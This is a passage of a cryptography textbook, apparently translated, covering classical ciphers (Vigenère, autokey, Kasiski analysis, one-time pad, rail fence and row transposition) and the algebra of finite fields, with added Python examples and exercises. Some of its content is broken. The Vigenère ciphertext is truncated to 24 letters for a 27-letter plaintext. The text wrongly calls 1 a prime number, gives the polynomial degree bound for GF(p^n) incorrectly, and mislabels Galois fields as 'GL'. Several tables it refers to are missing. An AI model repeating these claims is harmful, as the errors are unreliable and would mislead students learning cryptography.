Suppose the key is a word of length d written as K = K1K2...Kd, where each Ki takes an integer value from 0 to 25. We then divide the plaintext into blocks of d letters. The i-th letter of a block is assigned the i-th alphabet, with shift Ki as in the Caesar cipher. In practice, when encrypting, we use the alphabets in turn and start again from the beginning after d letters of the plaintext. Because there are several different alphabets, the same letter at different positions gets different jumps, which spreads the letter frequencies of the ciphertext fairly evenly.

Decryption is simply the reverse process: use the ciphertext and the keyword with the corresponding alphabets, but for each letter jump backwards towards the beginning.

Example: to use the Vigenere cipher with a given keyword and plaintext, proceed as follows:

- Write out the plaintext.
- Write the keyword repeatedly above it, letter for letter.
- Use each letter of the keyword as the key of a Caesar cipher.
- Encrypt the corresponding letter of the plaintext with the corresponding jump.
- For example, using the keyword deceptive:

key:        deceptivedeceptivedeceptive
plaintext:  wearediscoveredsaveyourself
ciphertext: ZICVTWQNGRZGVTWAVZHCQYGL

To encrypt the first letter w we take the first letter of the key, d, so w is encrypted with the alphabet shifted by 3 (that is, a is shifted to d). The first letter w is therefore encrypted as Z. The second letter of the keyword is e, which means that the second letter of the plaintext is shifted by 4 (from a to e). The second letter of the plaintext, e, is thus encrypted as I. And so on until the end of the plaintext.

In practice, to support the Vigenere cipher, the Saint Cyr table was created to help with manual encryption and decryption. It is a 26 x 26 table whose rows and columns are labelled with the letters of the English alphabet. Row i is the alphabet shifted by i letters. The letter in the first column is then the key of the alphabet in that row. Hence the ciphertext letter for a plaintext letter lies in the same column as that letter and in the row corresponding to the key letter.

    ABCDEFGHIJKLMNOPQRSTUVWXYZ
A   ABCDEFGHIJKLMNOPQRSTUVWXYZ
B   BCDEFGHIJKLMNOPQRSTUVWXYZA
C   CDEFGHIJKLMNOPQRSTUVWXYZAB
D   DEFGHIJKLMNOPQRSTUVWXYZABC
E   EFGHIJKLMNOPQRSTUVWXYZABCD
F   FGHIJKLMNOPQRSTUVWXYZABCDE
G   GHIJKLMNOPQRSTUVWXYZABCDEF
H   HIJKLMNOPQRSTUVWXYZABCDEFG
I   IJKLMNOPQRSTUVWXYZABCDEFGH
J   JKLMNOPQRSTUVWXYZABCDEFGHI
K   KLMNOPQRSTUVWXYZABCDEFGHIJ
L   LMNOPQRSTUVWXYZABCDEFGHIJK
M   MNOPQRSTUVWXYZABCDEFGHIJKL
N   NOPQRSTUVWXYZABCDEFGHIJKLM
O   OPQRSTUVWXYZABCDEFGHIJKLMN
P   PQRSTUVWXYZABCDEFGHIJKLMNO
Q   QRSTUVWXYZABCDEFGHIJKLMNOP
R   RSTUVWXYZABCDEFGHIJKLMNOPQ
S   STUVWXYZABCDEFGHIJKLMNOPQR
T   TUVWXYZABCDEFGHIJKLMNOPQRS
U   UVWXYZABCDEFGHIJKLMNOPQRST
V   VWXYZABCDEFGHIJKLMNOPQRSTU
W   WXYZABCDEFGHIJKLMNOPQRSTUV
X   XYZABCDEFGHIJKLMNOPQRSTUVW
Y   YZABCDEFGHIJKLMNOPQRSTUVWX
Z   ZABCDEFGHIJKLMNOPQRSTUVWXY

Saint Cyr table

Security of the Vigenere cipher. There are several different ciphertext letters for the same plaintext letter. As a result the letter frequencies are flattened, that is, the letters occur in the ciphertext with roughly equal frequency. The structure is not lost completely, however: because the key has finite length, it produces a repeating period. The cryptanalyst starts from the letter frequencies to see whether the cipher is monoalphabetic. If it is assumed to be polyalphabetic, the next step is to determine the number of alphabets in the keyword and then to find each of them in turn. So the keyword length should be increased, to increase the number of alphabets used in encryption and flatten the letter frequencies.

II.2.6 The Kasiski method of cryptanalysis

The method was developed by Babbage and Kasiski. Identical letters in the plaintext that are separated by exactly the keyword length (the period) are encrypted to the same letters. Repetitions of letters in the ciphertext can therefore reveal the period. Of course, the keyword length cannot always be found this way. Once it is known, the letters of the keyword are found by attacking each single alphabet with the same technique as before, based on frequency tables of letter groups.

II.2.7 Autokey cipher

Ideally we would have a key as long as the message. Vigenere therefore proposed an automatically generated key of the same length as the message: the keyword is followed by the plaintext itself to form the key. The Vigenere cipher is then used to encrypt the plaintext. Knowing the keyword, one can recover the first few letters of the plaintext, and then go on using them to decrypt the rest of the text. This improvement removes the notion of a period and makes cryptanalysis harder, but frequency characteristics remain that can be attacked.

Example. Take the keyword deceptive. We write the plaintext after the keyword to form a new key whose length equals the length of the plaintext.

    key:        deceptivewearediscoveredsav
    plaintext:  wearediscoveredsaveyourself
    ciphertext: ZICVTWQNGKZEIIGASXSTSLVVWLA

II.2.8 One-time pad

If a truly random key as long as the plaintext is used, we call it a one-time pad. Because it is used only once and is random, the encryption is secure. The cipher cannot be broken, because the ciphertext has no statistical relationship with the plaintext, the pad being randomly generated. The one-time pad can be said to be absolutely secure, because for any plaintext and any ciphertext there always exists a key that maps that plaintext to the given ciphertext. In theory, every message (of the same length as the plaintext) over the cipher alphabet is equally likely to be the encryption of a given plaintext. The key is used only once, so the encryptions are independent of one another. The difficulty of the one-time pad lies in generating random keys and distributing them securely. The one-time pad is therefore rarely used, and only where very high security is required.

II.3 Classical transposition ciphers

In the previous sections we considered substitution ciphers, in which the letters of the plaintext are replaced by other letters in the ciphertext. We now turn to another kind of cipher, the transposition (permutation) cipher, in which the letters of the plaintext are not replaced by other letters but only change position; encryption merely moves the letters of the plaintext relative to one another. It hides the plaintext by changing the order of the letters, without changing the letters actually used. The ciphertext therefore has the same letter frequency distribution as the original text, and so cryptanalysis can detect it.

II.3.1 Rail Fence cipher

This is a simple transposition cipher.
Write the letters of the plaintext diagonally over a number of rows, then read off the letters row by row to obtain the ciphertext. The number of rows is the key of the cipher: knowing the number of rows, we can work out the number of letters in each row, write the ciphertext back into the rows, and recover the plaintext by reading along the columns.

Example. Write the message "meet me after the toga party" alternately on two rows as follows:

    m e m a t r h t g p r y
     e t e f e t e o a a t

Joining the letters of the first row with the letters of the second row gives the ciphertext:

    MEMATRHTGPRYETEFETEOAAT

II.3.2 Row transposition cipher

This is a more complex scheme. Write the letters of the message in rows with a fixed number of columns. Then reorder the columns according to a given key sequence of numbers, and read them off column by column to obtain the ciphertext. Decryption is carried out in reverse.

Example:

    Key:        4 3 1 2 5 6 7
    Plaintext:  a t t a c k p
                o s t p o n e
                d u n t i l t
                w o a m x y z

Reading the columns in order from 1 to 7 gives the ciphertext:

    Ciphertext: TTNAAPTMTSUOAODWCOIXKNLYPETZ

II.3.3 Product ciphers

Ciphers based on permutation or transposition are not secure, because the frequency characteristics of the language are unchanged. Several ciphers can be applied in succession to make the cipher harder. Classical ciphers use only one of the two methods, substitution or permutation. The idea is to combine both methods in the same cipher, possibly interleaved or repeated over several rounds. One might think that repeating the same kind of cipher several times produces a more complex cipher, but in some cases the result is in essence equivalent to a single cipher of the same kind: the product of two substitutions is a substitution, and the product of two permutations is a permutation. If the two ciphers are of different kinds, however, a new and more complex cipher results; this is why a substitution followed by a transposition produces a new cipher that is much harder. This is the bridge from classical ciphers to modern ciphers.

Weaknesses of classical ciphers:
- Classical encryption can easily be broken by guessing letters, using statistics on the frequency of letters in the ciphertext and comparing them with the observed statistics of plaintext.
- To use classical encryption, the encrypting side and the decrypting side must agree on the encryption and decryption mechanism. Otherwise the two sides cannot work with each other.

II.4 Some other topics

II.4.1 Rotor machines

Before modern ciphers, rotor machines were the most widely used product cipher. They were used extensively in World War II by Germany, the Allies and Japan. A rotor machine produces a very varied and complex substitution cipher. The machine uses a number of cylinders, each corresponding to a substitution; as they rotate, each letter is replaced by another corresponding letter. With 3 different cylinders we have 26 x 26 x 26 = 17576 alphabets.

II.4.2 Steganography

Another technique for protecting the confidentiality of transmitted information is steganography. It is an option used in combination with, or at the same time as, encryption. Steganography hides the existence of the confidential message inside other information, for example: using only a subset of the letters or words of a long message, marked in some way; using invisible ink; hiding information in audio or image files. These techniques have recently attracted research interest. Their drawback, however, is that only a small number of bits of information can be hidden.
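The Vigenere cipher (II.2.5), the autokey variant (II.2.7) and the Kasiski repetition test (II.2.6) applied to the keyword deceptive and the plaintext used in the text. This is an added example, not part of the original text; the function names and the choice of 3-letter groups for the Kasiski test are assumptions of the example.

```python
from functools import reduce
from math import gcd
import string

A = string.ascii_lowercase


def _letters(text):
    """Keep only the letters a-z, lower-cased."""
    return [c for c in text.lower() if c in A]


def _shift(ch, k):
    """Caesar-shift one lower-case letter by k positions (k may be negative)."""
    return A[(A.index(ch) + k) % 26]


def vigenere_encrypt(plaintext, key):
    """Letter i is shifted by key letter (i mod d), where d is the key length."""
    key = key.lower()
    return "".join(_shift(c, A.index(key[i % len(key)]))
                   for i, c in enumerate(_letters(plaintext))).upper()


def vigenere_decrypt(ciphertext, key):
    """Same alphabets, but every letter is shifted backwards."""
    key = key.lower()
    return "".join(_shift(c, -A.index(key[i % len(key)]))
                   for i, c in enumerate(_letters(ciphertext)))


def autokey_encrypt(plaintext, key):
    """The running key is the keyword followed by the plaintext itself."""
    letters = _letters(plaintext)
    stream = (list(key.lower()) + letters)[:len(letters)]
    return "".join(_shift(p, A.index(k)) for p, k in zip(letters, stream)).upper()


def autokey_decrypt(ciphertext, key):
    """Each recovered plaintext letter is appended to the key stream."""
    stream, out = list(key.lower()), []
    for i, c in enumerate(_letters(ciphertext)):
        p = _shift(c, -A.index(stream[i]))
        out.append(p)
        stream.append(p)
    return "".join(out)


def kasiski(ciphertext, n=3):
    """Return ({repeated n-gram: [distances]}, gcd of all distances or None).

    A distance is measured between consecutive occurrences of the same n-gram;
    the gcd of the distances is the candidate period (keyword length).
    """
    c = "".join(_letters(ciphertext)).upper()
    last_seen, distances = {}, {}
    for i in range(len(c) - n + 1):
        gram = c[i:i + n]
        if gram in last_seen:
            distances.setdefault(gram, []).append(i - last_seen[gram])
        last_seen[gram] = i
    flat = [d for ds in distances.values() for d in ds]
    return distances, (reduce(gcd, flat) if flat else None)


if __name__ == "__main__":
    pt, key = "wearediscoveredsaveyourself", "deceptive"
    ct = vigenere_encrypt(pt, key)   # begins with the 24 letters printed in the text
    print("Vigenere:", ct, "->", vigenere_decrypt(ct, key))
    print("Kasiski :", kasiski(ct))  # one repeated trigram, 9 apart = len(key)
    ak = autokey_encrypt(pt, key)
    print("Autokey :", ak, "->", autokey_decrypt(ak, key))
    print("Kasiski :", kasiski(ak))  # no repetition: the period is gone
```
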

Exercises

1. The following ciphertext was produced with the Caesar cipher: "GCUA VQ DTGCM". Deduce the plaintext.
2. Using the technique for cryptanalysing a monoalphabetic cipher, build frequency tables of the letters, letter pairs and letter triples of the following ciphertext:
   UZQSOVUOHXMOPVGPOZPEVSGZWSZOPFPESXUDBMETSXAIVUEPHZH MDZSHZOWSFPAPPDTSVPQUZWYMXUZUHSXEPYEPOPDZSZUFPOUDTM OHMQ
   Argue for and give the mapping of the single alphabet, and produce a suitable plaintext.
3. State the algorithm that uses the Saint Cyr table to encrypt and decrypt with the Vigenere cipher when the keyword is known. Apply the algorithm to encrypt the plaintext "Network Security is very important for software development" with the keyword "COMPUTER SCIENCE".
4. Why can one say: "The one-time pad can be said to be absolutely secure, because for any plaintext and any ciphertext there always exists a key that maps that plaintext to the given ciphertext"? Explain the following statement: "In theory, every message (of the same length as the plaintext) over the cipher alphabet is equally likely to be the encryption of a given plaintext."
5. Find the ciphertext of the plaintext "We are studying cryptography this year" using the Playfair cipher with the keyword "information technology".
6. Show that transposition does not remove the redundancy of natural language.
7. Prove that the product of two simple substitutions is a simple substitution and that the product of two transpositions is a transposition. What can be said about the product of a simple substitution and a transposition?
8. How many different Playfair keys are there?
9. Encrypt the plaintext "Chung toi se la nhung ky su cong nghe thong tin gioi trong mot vai nam nua" using the key 631425.
10. Suppose a row transposition cipher with 8 columns is used. How many different keys are there? State the decryption algorithm for a given key.
11. Prove that the product of two substitutions is a substitution and that the product of two permutations is a permutation.

CHAPTER 3: FINITE FIELDS

Introduction

This chapter introduces an algebraic structure, the finite field. It is a mathematical model that plays an important role in cryptography, for example in the Advanced Encryption Standard AES, elliptic curve cryptography, the IDEA cipher and public-key cryptography. It concerns operations on "numbers": here "number" is a more general notion than the integers, real numbers and complex numbers met in arithmetic; in general the "numbers" can be the elements of some set. The set is equipped with operations that satisfy certain properties, like numbers with the operations of addition, subtraction, multiplication and division. We start from the notions of group, ring and field of abstract algebra.

III.1 Algebraic structures

III.1.1 Groups

Consider a set of elements or "numbers" and a binary operation whose result is again an element of the set. That is, for every pair of elements of the set, the result of the operation is a definite element of the given set. We call this property the closure of the operation on the set.

Definition of a group. The set G with the given operation . is called a group if it satisfies the following properties for all elements a, b, c of G:
o Associativity: (a.b).c = a.(b.c)
o There is an identity e: e.a = a.e = a
o There is an inverse a^-1: a.a^-1 = e
If in addition the operation is commutative, a.b = b.a, the group is called an Abelian or commutative group.

Definition of a cyclic group.
o Exponentiation is defined as repeated application of the operation. Example: a^3 = a.a.a
o The identity is e = a^0
o A group is called cyclic if every element is a power of some fixed element, that is, b = a^k for a fixed a and every b in the group.
o In that case a is called a generator of the group.

III.1.2 Rings

Consider a set R of "numbers" with two operations called addition and multiplication. Here "number" means an element of the set, and the two operations are defined on that set. The set with these two operations is called a ring if the operations satisfy the following properties:
o Under addition, R is an Abelian group
o Multiplication is closed and associative, and distributes over addition: a(b+c) = ab + ac

If multiplication is commutative, the ring is a commutative ring. If multiplication has an inverse and there are no zero divisors (that is, no two nonzero elements whose product is 0), the ring forms an integral domain.

III.1.3 Fields

A field is a set F with two operations, addition and multiplication, satisfying the following properties:
o Under addition, F is an Abelian group
o Under multiplication, F without the element 0 is an Abelian group
o F is a ring
One can say that a field has the operations of addition, subtraction, multiplication and division by nonzero numbers. Subtraction is regarded as adding the additive inverse, and division as multiplying by the multiplicative inverse:

    a - b = a + (-b)
    a / b = a.b^-1

Example. It is easy to see that, with ordinary addition and multiplication:
o The set of integers Z is an Abelian group under addition
o The set of integers Z is a commutative ring
o The set of rational numbers Q is a field
o The set of real numbers R is a field
o The set of complex numbers C is a field under addition and multiplication of complex numbers

III.2 Modular arithmetic

III.2.1 Definition of modulo

Let n be a natural number and a an integer. We define a mod n to be the positive remainder when a is divided by n. We define an equivalence relation on the integers: a ≡ b mod n if and only if a and b have the same remainder when divided by n.
o Example: 100 mod 11 = 1; 34 mod 11 = 1, so 100 ≡ 34 mod 11
o The number b is called the representative of a if a ≡ b mod n (a = qn + b) and 0 <= b < n.
o Example: -12 mod 7 ≡ -5 mod 7 ≡ 2 mod 7 ≡ 9 mod 7. Here 2 is the representative of -12, -5, 2 and 9.
o Modulo 7, the equivalence classes can be written out in rows as follows:

    ...
    -21 -20 -19 -18 -17 -16 -15
    -14 -13 -12 -11 -10  -9  -8
     -7  -6  -5  -4  -3  -2  -1
      0   1   2   3   4   5   6
      7   8   9  10  11  12  13
     14  15  16  17  18  19  20
     21  22  23  24  25  26  27
     28  29  30  31  32  33  34
    ...

Elements in the same column are congruent to one another. The set of representatives of the integers modulo n has n elements and is denoted Zn = { 0, 1, 2, 3, ..., n-1 }.

Divisors
o A non-negative number b is called a divisor of a if there is a number m such that a = mb, where a, b and m are all integers.
o That is, a is divisible by b, written b|a
o Example: 1, 2, 3, 4, 6, 8, 12, 24 are the divisors of 24

III.2.2 Arithmetic operations modulo n

Let a number n be given. We want to carry out operations modulo n. We can perform the operations on integers as ordinary integer addition and multiplication and then reduce the result modulo n, or we can reduce at any point during the computation:

    (a+b) mod n = [a mod n + b mod n] mod n    (*)
    (a.b) mod n = [a mod n . b mod n] mod n    (**)

So when carrying out the operations we can replace numbers by numbers equivalent to them modulo n or, more simply, perform the operations on the representatives: Zn = { 0, 1, 2, 3, ..., n-1 }.
o Zn with the operations modulo n forms a commutative ring with identity. Indeed, closure of addition and multiplication follows from the two formulas (*) and (**). Associativity, commutativity and inverses follow from the corresponding properties of the integers.
o Notes on cancellation:
  if (a+b) ≡ (a+c) mod n, then b ≡ c mod n;
  but if (ab) ≡ (ac) mod n, then b ≡ c mod n only if a is relatively prime to n.

Example. Applying the properties of modulo:

    (11*19 + 10^17) mod 7
      = ((11*19) mod 7 + 10^17 mod 7) mod 7
      = ((11 mod 7 * 19 mod 7) mod 7 + (10 mod 7)^17 mod 7) mod 7
      = ((4.(-2)) mod 7 + (((3^2)^2)^2)^2 * 3 mod 7) mod 7
      = ((-1) mod 7 + ((2^2)^2)^2 * 3 mod 7) mod 7
      = (-1 + 5) mod 7 = 4

Example: the addition table modulo 8


III.2.3 Greatest common divisor

The problem. Let a and b be two positive integers. Finding the greatest common divisor of two positive integers is a common problem in number theory. We write GCD(a,b) for the greatest positive common divisor of a and b, that is, the positive integer that divides both a and b and is the largest positive integer with that property.

Example: GCD(60,24) = 12; GCD(6, 15) = 3; GCD(8, 21) = 1.

Relatively prime numbers. 1 is always a common divisor of any two positive integers. If GCD(a, b) = 1, then a and b are called relatively prime. Example: GCD(8,15) = 1, so 8 and 15 are relatively prime.

Finding the greatest common divisor. We now consider the problem of finding the greatest common divisor of two given positive integers. The following property is easy to prove:

    GCD(a,b) = GCD(b, a mod b)

So to find the common divisor of a given pair of numbers, we reduce the problem to finding the common divisor of the pair made up of the smaller of the two numbers and the remainder of the larger number divided by the smaller. Euclid's algorithm forms a loop: at each step we apply the property above, for as long as the remainder is nonzero.

Euclid's algorithm for GCD(a, b):

    A = a, B = b
    while B > 0
        R = A mod B
        A = B, B = R
    return A

Example: GCD(1970, 1066)

    1970 = 1 x 1066 + 904     gcd(1066, 904)
    1066 = 1 x 904 + 162      gcd(904, 162)
    904  = 5 x 162 + 94       gcd(162, 94)
    162  = 1 x 94 + 68        gcd(94, 68)
    94   = 1 x 68 + 26        gcd(68, 26)
    68   = 2 x 26 + 16        gcd(26, 16)
    26   = 1 x 16 + 10        gcd(16, 10)
    16   = 1 x 10 + 6         gcd(10, 6)
    10   = 1 x 6 + 4          gcd(6, 4)
    6    = 1 x 4 + 2          gcd(4, 2)
    4    = 2 x 2 + 0          gcd(1970, 1066) = 2

III.3 Galois fields

We want to find a field with a finite number of elements, that is, a finite set of elements on which we can add, subtract, multiply and divide without leaving the set. Galois fields are of this kind and play an important role in cryptography. It can be proved that the number of elements of any finite field is a power p^m of some prime p; we denote this Galois field by GL(p^m). The fields normally used are GL(p) and GL(2^m). We now construct these Galois fields.

III.3.1 The Galois field GL(p), with p prime

o GL(p) consists of the set {0, 1, ..., p-1}
o With addition and multiplication modulo p, as we have seen, GL(p) forms a commutative ring. Because p is prime, every nonzero number less than p is relatively prime to p. GL(p) forms a field because every a in {1, ..., p-1} has an inverse a^-1: a . a^-1 = 1. Indeed, since a and p are relatively prime, the algorithm for finding inverses given below finds the inverse of a. So in GL(p) we can add, subtract, multiply and divide.

Example: multiplication in GL(7)

III.3.2 Finding the inverse

We now consider the problem: if GCD(m, b) = 1, find the inverse of b modulo m. We extend Euclid's algorithm so that it both finds the greatest common divisor of m and b and computes the inverse when GCD(m, b) = 1.

The extended Euclidean algorithm:

    EXTENDED EUCLID(m, b)
    1. (A1, A2, A3) = (1, 0, m); (B1, B2, B3) = (0, 1, b)
    2. if B3 = 0 return A3 = gcd(m, b); no inverse
    3. if B3 = 1 return B3 = gcd(m, b); B2 = b^-1 mod m
    4. Q = A3 div B3
    5. (T1, T2, T3) = (A1 - Q*B1, A2 - Q*B2, A3 - Q*B3)
    6. (A1, A2, A3) = (B1, B2, B3)
    7. (B1, B2, B3) = (T1, T2, T3)
    8. goto 2

Indeed, the following relations are invariants:

    mA1 + bA2 = A3    (1)
    mB1 + bB2 = B3    (2)
    mT1 + bT2 = T3    (3)

Initially m.1 + b.0 = m and m.0 + b.1 = b, so (1) and (2) hold. We show that within one iteration (3) follows from (1) and (2). From the algorithm we have:

    T1 = A1 - Q.B1
    T2 = A2 - Q.B2
    T3 = A3 - Q.B3

So it remains to prove equality (3):

    mT1 + bT2 = m(A1 - Q.B1) + b(A2 - Q.B2) = (mA1 + bA2) - Q(mB1 + bB2) = A3 - Q.B3 = T3

Moving to the next iteration, B takes the role of A and T the role of B, so formulas (1) and (2) hold for the new A and B, and by the proof above (3) holds in the next iteration. Hence (1), (2) and (3) are loop invariants. Finally, when B3 = 1, the invariants give:

    mB1 + bB2 = 1
    bB2 = 1 - mB1
    bB2 = 1 mod m

Hence B2 = b^-1 mod m.

Example. Find the inverse of 550 in GL(1759).

Each step of the extended Euclidean algorithm is described by one row of the following table.
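An implementation of the EXTENDED EUCLID listing above, added here as an example (not code from the original text): it records one row (Q, A1, A2, A3, B1, B2, B3) per pass and checks invariants (1) and (2) on every pass. The function names and the row layout are choices made for this example.

```python
def extended_euclid(m, b):
    """Run EXTENDED EUCLID(m, b) for positive integers m and b.

    Returns (gcd, inverse, rows). inverse is b^-1 mod m reduced to 0..m-1,
    or None when gcd(m, b) != 1. rows[0] is the initial state (Q is None);
    every later row is the state after one pass of steps 4 to 7.
    """
    A = (1, 0, m)
    B = (0, 1, b)
    rows = [(None,) + A + B]
    while True:
        # Invariants (1) and (2) from the text.
        assert m * A[0] + b * A[1] == A[2]
        assert m * B[0] + b * B[1] == B[2]
        if B[2] == 0:                      # step 2: gcd found, no inverse
            return A[2], None, rows
        if B[2] == 1:                      # step 3: B2 is the inverse
            return 1, B[1] % m, rows       # B2 may be negative, so reduce it
        q = A[2] // B[2]                   # step 4
        T = tuple(x - q * y for x, y in zip(A, B))   # step 5
        A, B = B, T                        # steps 6 and 7
        rows.append((q,) + A + B)


def format_rows(rows):
    """Render the trace as text, one line per row."""
    head = "{:>4} {:>6} {:>6} {:>6} {:>6} {:>6} {:>6}".format(
        "Q", "A1", "A2", "A3", "B1", "B2", "B3")
    body = ["{:>4} {:>6} {:>6} {:>6} {:>6} {:>6} {:>6}".format(
        "-" if r[0] is None else r[0], *r[1:]) for r in rows]
    return "\n".join([head] + body)


if __name__ == "__main__":
    g, inv, rows = extended_euclid(1759, 550)
    print(format_rows(rows))
    print("gcd =", g, " 550^-1 mod 1759 =", inv)
```
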

After 4 steps we have B3 = 1 and the algorithm stops: GCD(1759, 550) = 1 and 550^-1 mod 1759 = 355.

III.3.3 Polynomial arithmetic

We consider the set P_n of polynomials of degree less than or equal to n:

On the set of polynomials there are several ways of carrying out polynomial addition and multiplication:
o Ordinary polynomial arithmetic
o Polynomial arithmetic with coefficients modulo p
o Polynomial arithmetic with coefficients modulo p, followed by reduction modulo a polynomial m(x)

Ordinary polynomial arithmetic
o Add or subtract corresponding coefficients
o Multiply every coefficient by the same number

Example. f(x) = x^3 + x^2 + 2 and g(x) = x^2 - x + 1

    f(x) + g(x) = x^3 + 2x^2 - x + 3
    f(x) - g(x) = x^3 + x + 1
    f(x) . g(x) = x^5 + 3x^2 - 2x + 2

Polynomial arithmetic with coefficients modulo p
o Take an arbitrary prime p
o Compute the coefficients modulo p. The coefficients are then taken from the field GL(p). Polynomial multiplication can still produce a polynomial of degree greater than n.
o We are usually interested in mod 2, where every coefficient is 0 or 1

Suppose f(x) = x^3 + x^2 and g(x) = x^2 + x + 1

    f(x) + g(x) = x^3 + x + 1

    f(x) . g(x) = x^5 + x^2

We now look separately at the case where polynomial addition and multiplication are carried out with reduction modulo some polynomial.

III.3.4 Polynomial arithmetic modulo a polynomial

Let g(x) be a polynomial of degree n, with the coefficients of all polynomials in this section taken from the Galois field GF(p), p prime. Write the polynomial f(x) in the form

    f(x) = q(x) g(x) + r(x)

where r(x) is the remainder when f(x) is divided by g(x). Clearly the degree of r(x) is smaller than the degree of g(x). We write

    r(x) = f(x) mod g(x)

If there is no remainder, that is r(x) = 0, we say that g(x) is a divisor of f(x), or g(x) divides f(x), or f(x) is divisible by g(x). If g(x) has no divisors other than 1 and itself, we say that g(x) is a prime, or irreducible, polynomial. For example, g(x) = x^3 + x + 1 is a prime polynomial. The greatest common divisor of two polynomials is found by an algorithm analogous to Euclid's, as follows.

Finding the greatest common divisor polynomial GCD(a(x), b(x))
o c(x) = GCD(a(x), b(x)) if c(x) is the polynomial of highest degree that divides both a(x) and b(x)
o Euclid's algorithm can be adapted to find it:

    EUCLID[a(x), b(x)]
    1. A(x) = a(x); B(x) = b(x)
    2. if B(x) = 0 return A(x) = gcd[a(x), b(x)]
    3. R(x) = A(x) mod B(x)
    4. A(x) ← B(x)
    5. B(x) ← R(x)
    6. goto 2

The algorithm for finding the inverse of a polynomial modulo a polynomial relatively prime to it is analogous to the extended Euclidean algorithm.

Polynomial arithmetic modulo a polynomial. Let g(x) be a prime polynomial of degree n. Then the set of polynomials of degree less than or equal to n, with polynomial addition and multiplication modulo the prime polynomial g(x), forms a finite field, called a Galois field and denoted GL(p^n).

We now consider the field GF(2^n), that is, the set of polynomials with coefficients modulo 2 and degree less than or equal to n, where multiplication is reduced modulo a prime polynomial g(x) of degree n. Inverses can be found with the extended Euclidean algorithm. For convenience in representing polynomials, however, we construct a bijection from the set of polynomials of degree less than n to n-bit strings, the string of coefficients that indicate the presence of the corresponding powers, and we define addition and multiplication of bit strings so that the results are the same as adding and multiplying the corresponding polynomials and reducing modulo the prime polynomial. For simplicity we illustrate this with a concrete example in GL(2^3).

Example: GF(2^3)


The table above can be built by computing polynomial addition and multiplication directly and then reducing modulo the prime polynomial x^3 + x + 1. The operations can, however, be carried out on 3-bit strings as follows:
o Because the coefficients are 0 or 1, polynomials can be represented as bit strings.
o Adding two polynomials becomes XOR (addition in base 2) of the bit strings corresponding to the two polynomials.
o Multiplying a polynomial by x becomes a left shift by 1 position of the bit string corresponding to the polynomial.
o Reducing a polynomial of the same degree n modulo the prime polynomial is done by computing the difference, which is also the sum, of the two polynomials, that is, by XORing the bit string of the polynomial with the bit string of the prime polynomial.
o Multiplication and modular reduction are combined by repeating Shift and XOR.
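The bit-string rules listed above, written out as shift-and-XOR multiplication in GF(2^n) with the prime polynomial x^3 + x + 1 (bits 1011) as the default. This is an added example, not part of the original text; the exhaustive-search inverse and the reducible polynomial x^3 + 1 used as a counter-example are choices made for this example.

```python
def gf_mul(a, b, poly=0b1011, n=3):
    """Multiply two elements of GF(2^n) given as n-bit integers.

    poly is the degree-n reduction polynomial including its x^n bit
    (0b1011 is x^3 + x + 1).
    """
    result = 0
    for _ in range(n):
        if b & 1:
            result ^= a        # add the current multiple of a (addition is XOR)
        b >>= 1
        a <<= 1                # multiply a by x: shift left by one position
        if a & (1 << n):       # degree reached n: reduce by XOR with poly
            a ^= poly
    return result


def gf_inverse(a, poly=0b1011, n=3):
    """Multiplicative inverse by exhaustive search, adequate for small n."""
    if a == 0:
        raise ZeroDivisionError("0 has no multiplicative inverse")
    for c in range(1, 1 << n):
        if gf_mul(a, c, poly, n) == 1:
            return c
    raise ValueError("no inverse: the reduction polynomial is not prime")


def mul_table(poly=0b1011, n=3):
    """Full multiplication table; row a, column b holds a*b."""
    size = 1 << n
    return [[gf_mul(a, b, poly, n) for b in range(size)] for a in range(size)]


if __name__ == "__main__":
    for row in mul_table():
        print(" ".join(format(v, "03b") for v in row))
    # Every nonzero element has an inverse, so the structure is a field.
    print({format(a, "03b"): format(gf_inverse(a), "03b") for a in range(1, 8)})
    # With x^3 + 1 = (x + 1)(x^2 + x + 1) the product below is 0:
    # zero divisors appear and the inverse search fails.
    print(gf_mul(0b011, 0b111, poly=0b1001))
```
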

Example. In GF(2^3), (x^2+1) corresponds to the bit string 101 (base 2) and (x^2+x+1) corresponds to the string 111 (base 2).

The sum of these two polynomials is

    (x^2+1) + (x^2+x+1) = x
    101 XOR 111 = 010 (base 2)

The product of two polynomials is

    (x+1).(x^2+1) = x.(x^2+1) + 1.(x^2+1) = x^3 + x + x^2 + 1 = x^3 + x^2 + x + 1
    011.101 = (101)<<1 XOR (101)<<0 = 1010 XOR 101 = 1111 (base 2)

The reduction modulo the prime polynomial is

    (x^3+x^2+x+1) mod (x^3+x+1) = (x^3+x^2+x+1) - (x^3+x+1) = x^2
    1111 mod 1011 = 1111 XOR 1011 = 0100 (base 2)

So the Galois field GL(2^n) has 2^n elements. To obtain a Galois field with an arbitrarily large number of elements we simply increase n and choose a suitable value. In particular, addition, subtraction, multiplication and division in such a field are very fast and efficient as operations on hardware devices. This is why Galois fields play an important role in cryptography, as we will see clearly in the following chapters.

III.4 Introduction to number theory

III.4.1 Prime numbers

As we know, prime numbers are positive integers whose only divisors are 1 and themselves. They cannot be written as a product of other numbers. 1 is a prime number, but we are not interested in it. Looking at the numbers less than 10: 2, 3, 5, 7 are prime, because they have no divisors other than 1 and themselves; 4, 6, 8, 9, 10 are not prime. 2 is the only even prime number. Prime numbers are central to number theory. There are infinitely many primes.

Example. The primes less than 200 are:

    2 3 5 7 11 13 17 19 23 29 31 37 41 43 47 53 59 61 67 71 73 79 83 89 97 101 103 107 109 113 127 131 137 139 149 151 157 163 167 173 179 181 191 193 197 199

III.4.2 Prime factorisation

One of the basic problems of arithmetic is to factor a number a into primes, that is, to write it as a product of prime numbers. Note that factoring is a much harder problem than multiplying numbers to obtain the product. We have the result that every positive integer has a unique factorisation as a product of powers of primes:

Example: 91 = 7×13; 3600 = 2^4×3^2×5^2

To find such a factorisation we normally test divisibility by the primes from small to large, divide repeatedly by those primes, and collect the results into powers of primes.

III.4.3 Relatively prime numbers and GCD

Two positive integers a and b that have no common divisor other than 1 are called relatively prime. Example: 8 and 15 are relatively prime, because the divisors of 8 are 1, 2, 4, 8 and the divisors of 15 are 1, 3, 5, 15. Only 1 is a common divisor of 8 and 15.

Conversely, the greatest common divisor can be determined from the prime factorisations of the two numbers: find the common prime factors and take the smaller of the two exponents in the two factorisations.

Example. We have the factorisations 300 = 2^1×3^1×5^2 and 18 = 2^1×3^2. So GCD(18,300) = 2^1×3^1×5^0 = 6.

III.4.4 Fermat's theorem (Fermat's little theorem)

    a^(p-1) mod p = 1

where p is prime and a is any integer that is not a multiple of p: GCD(a, p) = 1. Equivalently, for every prime p and every integer a that is not a multiple of p, we always have

    a^p = a mod p

The formula always holds if p is prime and a is a positive integer less than p.

